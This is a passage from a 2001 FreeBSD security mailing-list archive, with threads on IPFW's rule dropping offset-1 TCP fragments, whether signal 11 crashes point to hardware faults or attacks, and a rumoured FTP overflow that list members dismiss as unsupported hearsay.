([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDRJS500.M5N; Tue, 22 May 2001 17:52:53 -0700 Message-ID: <3B0B09F9.1825BEC4@globalstar.com> Date: Tue, 22 
May 2001 17:53:13 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Lowell Gilbert Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? References: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net> <44ae4669z0.fsf@lowellg.ne.mediaone.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lowell Gilbert wrote: > > diman@asd-g.com (diman) writes: > > > On 19 May 2001, Lowell Gilbert wrote: > > > > > dwplists@loop.com (D. W. Piper) writes: > > > > > > > If I understand things correctly from the archives and the IPFW man > > > > page, IPFW rule -1 is built into the firewall, and only applies to > > > > rejecting IP fragments with a fragment offset of one. The man page > > > > further states, "This is a valid packet, but it only has one use, to try > > > > to circumvent firewalls." > > > > > > > > Does that mean that every packet dropped by rule -1 indicates a > > > > deliberate attempt to circumvent the firewall, and should be reported to > > > > the appropriate network administrator for the source IP address? > > > > > > It's *possible* that the rule could be triggered by something that > > > wasn't an attack. Thinking about it briefly, it seems slightly more > > > likely that it's part of a probe, rather than an actual attack > > > However, reporting to the network administrator for that address is > > > almost certainly useless in any case, because an attacker would > > > probably have spoofed that address anyway. [An attacker wouldn't ever > > > get any response from that packet in any case.] > > > > Attacker can get answer from a destination host. It's a ipfw between > > if he willn't. Easy rule :) > > This is incorrect. 
The attacker can't get an answer in either case. > > The destination host won't reply unless the packet with the fragment > offset of zero *also* got through to that destination host, in which > case this rule doesn't matter. Huh? It sure does. If the first packet gets through, the second one is stopped, thus preventing all pieces from reaching the destination host and being reassembled. > If it isn't the case, the destination > host will never get a whole packet, and will never respond. > > The "rule -1" situation is only useful (to attackers) as part of a > traffic analysis scheme, and not terribly even for that. However, > there's no downside to dropping these packets, so we do. No, the use of these packets is to try to slip datagrams past a firewall. If a datagram containing a TCP segment is fragmented with an offset of 1 (8 bytes), the source and destination ports and the sequence number are in the first fragment, but the TCP flags will end up in the second fragment. This could potentially confuse a firewall that does not reassemble fragments (like ipfw(8)). The firewall has no TCP flags to check on that first fragment, so what does it do? In a stateless packet filter, how can you tell if a packet is part of an established connection without checking the flags? Well, ipfw(8) has been designed to not be concerned since it just drops that second fragment. See RFC1858 for a more complete discussion. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. 
If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:58:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id C1F5337B43C for ; Tue, 22 May 2001 17:58:33 -0700 (PDT) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id HAA09785; Wed, 23 May 2001 07:55:35 +0700 (GMT+0700) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id HAA13422; Wed, 23 May 2001 07:58:31 +0700 (ICT) Date: Wed, 23 May 2001 07:58:31 +0700 (ICT) Message-Id: <200105230058.HAA13422@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: veldy@veldy.net Cc: glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG In-reply-to: <019b01c0e2fe$eb384d40$3028680a@tgt.com> (veldy@veldy.net) Subject: Re: Qmail + FreeBSD 4.3 References: <019b01c0e2fe$eb384d40$3028680a@tgt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, As a good rule, hardware fails in the first hour after turning the power on for the first time, or it will fails some months/years later. Like anything, hardware do wear off, let say your CPU fan lightly slow down, it means CPU heat increase. Memory and card connectors are submitted to vibrations, even if not perceptible to human, so the contacts get oxyded (sp?). Examples could be multiple, it is not just disk mortors that fails. Best regards, olivier > Well bad hardware is less likely than its trying to overwrite memory it > doesn't own. 
If he is being attacked, and it is a buffer overflow exploit, > than overwriting memory it doesn't own is more likely than it being > repeatidly hardware, especially after his system has been working fine all > this time. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 18: 8:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id B38B337B424 for ; Tue, 22 May 2001 18:08:31 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDRKHK00.M5Q; Tue, 22 May 2001 18:08:08 -0700 Message-ID: <3B0B0D8C.3ADA76C1@globalstar.com> Date: Tue, 22 May 2001 18:08:28 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: diman Cc: Lowell Gilbert , freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org diman wrote: [snip] > It might be 'icmp: reassembly time exceed' or something else - it's > OS/Setup dependant. It might need more than 1 packet, but my point > is: "rule -1" can be used for ipfw detection/identification. > There are no much security risk unless u wanna hide ur frierwall from > peoples looks. I cannot say for sure, but I would expect that there are many firewall implementations that drop these kinds of fragments unconditionally. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. 
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Tue May 22 18:21:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.islandnet.com (mail.islandnet.com [199.175.106.4]) by hub.freebsd.org (Postfix) with ESMTP id 6097237B424 for ; Tue, 22 May 2001 18:21:47 -0700 (PDT) (envelope-from rb@islandnet.com)
Received: from [199.175.106.243] (helo=newwilly.islandnet.com) by mail.islandnet.com with SMTP id 152NLO-000I7g-00 for freebsd-security@freebsd.org; Tue, 22 May 2001 18:21:46 -0700
Content-Type: text/plain; charset="iso-8859-1"
From: Ron Brogden
Reply-To: rb@islandnet.com
Organization: Islandnet.com
To: freebsd-security@freebsd.org
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 18:18:10 +0000
X-Mailer: KMail [version 1.2]
References: <000501c0e316$7deb4450$45d8db40@mhx800> <0105221816290I.13659@newwilly.islandnet.com>
In-Reply-To: <0105221816290I.13659@newwilly.islandnet.com>
MIME-Version: 1.0
Message-Id: <0105221818100J.13659@newwilly.islandnet.com>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tuesday 22 May 2001 18:16, you wrote:
> On Tuesday 22 May 2001 23:25, you wrote:
> > There is an ftp vuln... I do not have any details on it sorry..
> > Some kinda overflow.. I would run proftpd

Care to back this up with some data? From all I have seen on the issue,
ProFTPD has suffered about as many showstoppers as WU-FTPD. I am not
claiming that WU-FTPD is necessarily better, just that I see it as no
worse and it is definitely not an immediate "solution" to security
hassles. It is *not* like comparing IIS to Apache (since Apache suffers
way fewer security problems in the codebase), more like comparing
Netscape (iPlanet) to IIS. =)

In the Bugtraq archives there are 12 vulnerability postings for WU-FTPD
and 8 for ProFTPD. Of the WU-FTPD ones, one is not actually in WU-FTPD
and a couple more are ancient. Also, a bunch are really just the same
issue from different vendors. Of the ProFTPD issues, there is a DoS as
well as buffer overflows, format strings, etc. Nothing there suggests
it has an even remotely better security record.

I cringe when I see people suggest that ProFTPD is more secure because
the facts do not bear it out and I fear it gives folks a false sense of
security. IMHO of course.

Cheers,

Ron
--

From owner-freebsd-security Tue May 22 18:34:06 2001
Delivered-To: freebsd-security@freebsd.org
Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 788CC37B424 for ; Tue, 22 May 2001 18:34:01 -0700 (PDT) (envelope-from subscribed@de-net.org)
Received: (qmail 12552 invoked by uid 504); 22 May 2001 18:29:31 -0000
Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 22 May 2001 18:29:31 -0000
From: "Dan Graaff"
To: "Thomas T. Veldhouse" , "Michael Tang Helmeste" ,
Subject: RE: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 18:33:10 -0700
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: <019b01c0e2fe$eb384d40$3028680a@tgt.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The interesting thing is, I have a CGI script that I wrote that does
this, on every server I run it on.. it runs fine, but then when it
exits, it exits error 11... nobody notices, and I never fixed it.. but
I'm thinking it isn't a RAM issue... if it were, the evil RAM god would
not only pick ONE process to haunt. In the past when I had RAM problems,
it would kill a process at random... usually the most demanding
process... vdelivermail shouldn't be that demanding.. I mean it's a
child process!!

-Dan Graaff / Digital
The DE-Network

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. Veldhouse
Sent: Tuesday, May 22, 2001 1:37 PM
To: Michael Tang Helmeste; freebsd-security@freebsd.org
Subject: Re: Qmail + FreeBSD 4.3

Swap memory and see. I had the same problem (different program). Apache
kept dying was my first symptom. Then postfix died occasionally. MySQL
dumped when used. A few things like that. It started happening on a
system that had been working for the better part of a year. It was the
CPU. Sig 11 more often than not is a hardware problem. There is only one
case I know of that I can reproducibly create a sig 11 when it is not
hardware.
If you run ncftp3 against a server and download a large directory using
the "tar on the fly" option, it will often dump core. This could be the
case with qmail, but I have not seen it reported, thus I think he should
check his hardware.

Tom Veldhouse

----- Original Message -----
From: "Michael Tang Helmeste"
To: "Thomas T. Veldhouse" ;
Sent: Tuesday, May 22, 2001 3:31 PM
Subject: RE: Qmail + FreeBSD 4.3

> Well bad hardware is less likely than it's trying to overwrite memory it
> doesn't own. If he is being attacked, and it is a buffer overflow exploit,
> then overwriting memory it doesn't own is more likely than it being
> repeatedly hardware, especially after his system has been working fine all
> this time.
>
> -----Original Message-----
> From: Thomas T. Veldhouse [mailto:veldy@veldy.net]
> Sent: Tuesday, May 22, 2001 9:16 AM
> To: Michael Tang Helmeste
> Subject: Re: Qmail + FreeBSD 4.3
>
>
> Signal 11 (and often 10) very often signals bad hardware. Memory and/or CPU
> are usually the cause, followed by the main board. Corruption occurs in
> memory and a signal 11 results.
>
> Tom Veldhouse
> veldy@veldy.net
>
> ----- Original Message -----
> From: "Michael Tang Helmeste"
> To:
> Sent: Monday, May 21, 2001 8:35 PM
> Subject: RE: Qmail + FreeBSD 4.3
>
>
> > actually it just means segmentation fault
> >
> > it happens when a program accesses some memory that it doesn't own
> >
> > -----Original Message-----
> > From: owner-freebsd-security@FreeBSD.ORG
> > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole
> > Sent: Monday, May 21, 2001 9:17 PM
> > To: subscribed@de-net.org
> > Cc: freebsd-security@FreeBSD.ORG
> > Subject: Re: Qmail + FreeBSD 4.3
> >
> >
> > Hi Dan,
> >
> > Signal 11 often denotes some hardware problem I guess, something like
> > overheating.
> >
> > Olivier

From owner-freebsd-security Tue May 22 18:36:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mta4.rcsntx.swbell.net (mta4.rcsntx.swbell.net [151.164.30.28]) by hub.freebsd.org (Postfix) with ESMTP id 2809437B424 for ; Tue, 22 May 2001 18:36:49 -0700 (PDT) (envelope-from ryanpek@swbell.net)
Received: from mhx800 ([64.219.216.69]) by mta4.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GDR00FI5LQ5MN@mta4.rcsntx.swbell.net> for freebsd-security@freebsd.org; Tue, 22 May 2001 20:34:53 -0500 (CDT)
Date: Tue, 22 May 2001 20:31:20 -0500
From: Ryan
Subject: Re: Is there a ftp vuln in 4.3-STABLE
To: freebsd-security@freebsd.org
Message-id: <001d01c0e328$120701e0$45d8db40@mhx800>
MIME-version: 1.0
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
Content-type: text/plain; charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
References:
X-Priority: 3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I was just informed by people I know.. And all I get is it's private.. if I
had it I would share.. sorry

ryan

----- Original Message -----
From: "Alex"
To: "Ryan"
Cc:
Sent: Tuesday, May 22, 2001 7:26 PM
Subject: Re: Is there a ftp vuln in 4.3-STABLE

> Is this a FreeBSD specific FTP vulnerability?
>
> -Alex
>
> On Tue, 22 May 2001, Ryan wrote:
>
> > There is an ftp vuln... I do not have any details on it sorry.. Some kinda
> > overflow.. I would run proftpd
> >
> >
> > ----- Original Message -----
> > From: "Retal"
> > To:
> > Sent: Tuesday, May 22, 2001 5:48 PM
> > Subject: Re: Is there a ftp vuln in 4.3-STABLE
> >
> >
> > > My guess, this happened to you because of a mistaken chmod, like perhaps you
> > > chmoded one of the following directories into the FTP directory for
> > > writing?
> > > You should it.
> > >
> > > -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il)
> > >
> > > ----- Original Message -----
> > > From: "serkoon"
> > > To: "Mike" ;
> > > Cc:
> > > Sent: Tuesday, May 22, 2001 11:11 PM
> > > Subject: Re: Is there a ftp vuln in 4.3-STABLE
> > >
> > >
> > > > I don't know what the mess below all means, but what I do know is
> > > > that there were some warez-kids who put some nice warez on your
> > > > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up
> > > > afterwards).
> > > >
> > > > > 1mbtest.ptf
> > > > > ???? Tagged By Wizardz Fxp ????

From owner-freebsd-security Tue May 22 19:33:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtppop1pub.verizon.net (smtppop1pub.gte.net [206.46.170.20]) by hub.freebsd.org (Postfix) with ESMTP id 671EF37B42C for ; Tue, 22 May 2001 19:33:26 -0700 (PDT) (envelope-from res03db2@gte.net)
Received: from gte.net (evrtwa1-ar4-4-34-145-186.evrtwa1.dsl.gtei.net [4.34.145.186]) by smtppop1pub.verizon.net with ESMTP ; id VAA114347356 Tue, 22 May 2001 21:25:36 -0500 (CDT)
Received: (from res03db2@localhost) by gte.net (8.9.3/8.9.3) id TAA20077; Tue, 22 May 2001 19:34:27 -0700 (PDT) (envelope-from res03db2@gte.net)
Date: Tue, 22 May 2001 19:34:27 -0700
From: Robert Clark
To: Olivier Nicole
Cc: veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG
Subject: Re: Qmail + FreeBSD 4.3
Message-ID: <20010522193427.A20063@darkstar.gte.net>
References: <019b01c0e2fe$eb384d40$3028680a@tgt.com> <200105230058.HAA13422@banyan.cs.ait.ac.th>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <200105230058.HAA13422@banyan.cs.ait.ac.th>; from on@cs.ait.ac.th on Wed, May 23, 2001 at 07:58:31AM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Or it fails some number of years later, when you power it on. [RC]

On Wed, May 23, 2001 at 07:58:31AM +0700, Olivier Nicole wrote:
> Hi,
>
> As a good rule, hardware fails in the first hour after turning the
> power on for the first time, or it fails some months/years later.
>
> Like anything, hardware does wear out; let's say your CPU fan slows
> down slightly, which means the CPU heat increases. Memory and card
> connectors are subjected to vibrations, even if not perceptible to
> humans, so the contacts get oxidized (sp?). Examples could be
> multiple; it is not just disk motors that fail.
>
> Best regards,
>
> olivier
>
> > Well bad hardware is less likely than it's trying to overwrite memory it
> > doesn't own. If he is being attacked, and it is a buffer overflow exploit,
> > then overwriting memory it doesn't own is more likely than it being
> > repeatedly hardware, especially after his system has been working fine all
> > this time.

From owner-freebsd-security Tue May 22 19:39:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id 8535037B42C for ; Tue, 22 May 2001 19:39:53 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EFF1066B5F; Tue, 22 May 2001 19:39:52 -0700 (PDT)
Date: Tue, 22 May 2001 19:39:52 -0700
From: Kris Kennaway
To: Alex
Cc: Ryan , freebsd-security@FreeBSD.ORG
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Message-ID: <20010522193952.A33978@xor.obsecurity.org>
References: <000501c0e316$7deb4450$45d8db40@mhx800>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="qDbXVdCdHGoSgWSk"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from alex@nixfreak.org on Tue, May 22, 2001 at 08:26:29PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--qDbXVdCdHGoSgWSk
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote:
> Is this a FreeBSD specific FTP vulnerability?
>
> -Alex
>
> On Tue, 22 May 2001, Ryan wrote:
>
> > There is an ftp vuln... I do not have any details on it sorry.. Some kinda
> > overflow.. I would run proftpd

No-one has informed the security-officer about any new vulnerability
in FreeBSD (or for that matter, about third party ftpd ports). It's
probably worthwhile not flying into a panic until someone actually
provides some corroborating evidence.
Kris

--qDbXVdCdHGoSgWSk
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.5 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7CyL4Wry0BWjoQKURAiAgAKCE1oLTSoaKtmVwOfse9YWwyvNCgQCguq/M
kAFt1gdditzpLi1fS5m44KQ=
=T13+
-----END PGP SIGNATURE-----

--qDbXVdCdHGoSgWSk--

From owner-freebsd-security Tue May 22 19:46:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 28C3137B422 for ; Tue, 22 May 2001 19:46:18 -0700 (PDT) (envelope-from mjacob@feral.com)
Received: from beppo (mjacob@beppo [192.67.166.79]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id f4N2a2P01102 for ; Tue, 22 May 2001 19:36:02 -0700 (PDT) (envelope-from mjacob@feral.com)
Date: Tue, 22 May 2001 19:35:56 -0700 (PDT)
From: Matthew Jacob
Reply-To: mjacob@feral.com
To: security@freebsd.org
Subject: ftp security (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

---------- Forwarded message ----------
Date: Wed, 23 May 2001 09:59:08 +0800 (CST)
From: "[gb2312] Gang Li"
To: freebsd-bugs@FreeBSD.ORG, freebsd-bug@FreeBSD.ORG
Subject: ftp security

hi,

I find ftp.cn.freebsd.org/pub/ports/distfiles has 777 privileges. I think it
is no good; if it is an error, pls check it soon.

wish you be better.

From owner-freebsd-security Tue May 22 19:50:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id BD33537B422 for ; Tue, 22 May 2001 19:50:43 -0700 (PDT) (envelope-from alex@nixfreak.org)
Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f4N2oTt10143; Tue, 22 May 2001 22:50:29 -0400 (EDT)
Date: Tue, 22 May 2001 22:50:29 -0400 (EDT)
From: Alex
X-X-Sender:
To: Kris Kennaway
Cc: Ryan ,
Subject: Re: Is there a ftp vuln in 4.3-STABLE
In-Reply-To: <20010522193952.A33978@xor.obsecurity.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Indeed, I'm not at all worried. I just was wondering if there was any
additional information available regarding this specific alleged
vulnerability.

-Alex

> On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote:
> > Is this a FreeBSD specific FTP vulnerability?
> >
> > -Alex
> >
> > On Tue, 22 May 2001, Ryan wrote:
> >
> > > There is an ftp vuln... I do not have any details on it sorry.. Some kinda
> > > overflow.. I would run proftpd
>
> No-one has informed the security-officer about any new vulnerability
> in FreeBSD (or for that matter, about third party ftpd ports).
> It's
> probably worthwhile not flying into a panic until someone actually
> provides some corroborating evidence.
>
> Kris
>

From owner-freebsd-security Tue May 22 20:46:08 2001
Delivered-To: freebsd-security@freebsd.org
Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 4369D37B424 for ; Tue, 22 May 2001 20:46:05 -0700 (PDT) (envelope-from scott@link-net.com)
Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with ESMTP id com for ; Tue, 22 May 2001 20:46:04 -0700
Reply-To:
From: "Scott Raymond"
To:
Subject: RE: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 20:46:02 -0700
Keywords: FreeBSD
Organization: LinkAmerica Communications
Message-ID: <003401c0e33a$e44fb090$f13d0ad1@linknet.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To:
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Seeing as how there is no corroborating evidence to support this
"exploit", only second-hand hearsay, I'd say this is more of a FUD troll
than an actual security warning.

--
Scott
==========================
Scott Raymond
LinkAmerica Communications
http://soundamerica.com
==========================

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex
> Sent: Tuesday, May 22, 2001 7:50 PM
> To: Kris Kennaway
> Cc: Ryan; freebsd-security@FreeBSD.ORG
> Subject: Re: Is there a ftp vuln in 4.3-STABLE
>
>
> Indeed, I'm not at all worried. I just was wondering if
> there was any
> additional information available regarding this specific alleged
> vulnerability.
>
> -Alex
>
> > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote:
> > > Is this a FreeBSD specific FTP vulnerability?
> > >
> > > -Alex
> > >
> > > On Tue, 22 May 2001, Ryan wrote:
> > >
> > > > There is an ftp vuln... I do not have any details on it
> sorry.. Some kinda
> > > > overflow.. I would run proftpd
> >
> > No-one has informed the security-officer about any new vulnerability
> > in FreeBSD (or for that matter, about third party ftpd ports). It's
> > probably worthwhile not flying into a panic until someone actually
> > provides some corroborating evidence.
> >
> > Kris
> >
>
>

From owner-freebsd-security Tue May 22 21:04:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id D573D37B43C for ; Tue, 22 May 2001 21:04:50 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru)
Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N44mT08134; Wed, 23 May 2001 10:04:49 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru)
Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N44mQ15183; Wed, 23 May 2001 10:04:48 +0600 (YEKST) (envelope-from serg)
Date: Wed, 23 May 2001 10:04:48 +0600
From: "Sergey N. Voronkov"
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Message-ID: <20010523100448.A15088@sv.tech.sibitex.tmn.ru>
References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010522193952.A33978@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 22, 2001 at 07:39:52PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, May 22, 2001 at 07:39:52PM -0700, Kris Kennaway wrote:
> On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote:
> > Is this a FreeBSD specific FTP vulnerability?
> >
> > -Alex
> >
> > On Tue, 22 May 2001, Ryan wrote:
> >
> > > There is an ftp vuln... I do not have any details on it sorry.. Some kinda
> > > overflow..
> > > I would run proftpd
>
> No-one has informed the security-officer about any new vulnerability
> in FreeBSD (or for that matter, about third party ftpd ports). It's
> probably worthwhile not flying into a panic until someone actually
> provides some corroborating evidence.
>

When I've found this stuff in my logfiles I've changed native ftpd to luke's
one. Sorry, can't get core to you... And don't want to setup native daemon
to provide potential hole to someone.

May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11
May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11

Also I have one question: how to setup ftpd to allow it dumping core to
specified destination?

Bye,

Serg N. Voronkov

From owner-freebsd-security Tue May 22 21:35:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id 37AB537B424 for ; Tue, 22 May 2001 21:35:36 -0700 (PDT) (envelope-from alex@nixfreak.org)
Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f4N4ZFt10655; Wed, 23 May 2001 00:35:15 -0400 (EDT)
Date: Wed, 23 May 2001 00:35:15 -0400 (EDT)
From: Alex
X-X-Sender:
To: "Sergey N. Voronkov"
Cc: Kris Kennaway ,
Subject: Re: Is there a ftp vuln in 4.3-STABLE
In-Reply-To: <20010523100448.A15088@sv.tech.sibitex.tmn.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> When I've found this stuff in my logfiles I've changed native ftpd to luke's
> one. Sorry, can't get core to you... And don't want to setup native daemon
> to provide potential hole to someone.
>
> May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11
> May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11

Who owns UID 14 on that machine? Not root I presume. So the
process itself that segmentation faulted wasn't actually executed by root.
Is UID 14 an FTP account for running the daemon?

-Alex

>
> Also I have one question: how to setup ftpd to allow it dumping core to
> specified destination?
>
> Bye,
>
> Serg N. Voronkov
>

From owner-freebsd-security Tue May 22 21:45:46 2001
Delivered-To: freebsd-security@freebsd.org
